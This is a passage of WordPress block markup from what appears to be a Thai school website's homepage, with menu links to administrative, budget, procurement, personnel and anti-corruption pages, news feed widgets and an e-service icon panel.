class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" 